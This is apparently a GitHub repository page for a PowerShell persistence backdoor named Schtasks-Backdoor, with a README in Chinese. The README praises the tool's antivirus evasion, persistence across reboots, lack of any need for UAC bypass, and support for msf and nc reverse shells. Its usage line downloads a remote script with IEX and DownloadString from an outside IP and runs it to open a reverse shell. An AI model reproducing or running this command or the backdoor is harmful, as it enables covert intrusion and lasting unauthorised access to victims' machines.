Skip to content
Powershell 权限维持后门
PowerShell
Branch: master
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
README.md
Schtasks-Backdoor.ps1
example.gif add demo Oct 17, 2016

README.md

Schtasks-Backdoor

About

一款权限维持后门PowerShell脚本

Principle

schtasks+regsvr32

Function

内网维持权限方法的一种。免杀效果好,重启生效。支持msf反弹,nc反弹,客户端不会用明显异常,自定义执行命令会有弹框(可以自己修改,思路可以使用mshta),一般实战中用nc或者msf。

Usage

powershell.exe -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://8.8.8.8/Invoke-taskBackdoor.ps1');Invoke-Tasksbackdoor -method msf -ip 8.8.8.8 -port 8081 -time 2"

此脚本优势就是不需要过uac权限。

Example

example

You can’t perform that action at this time.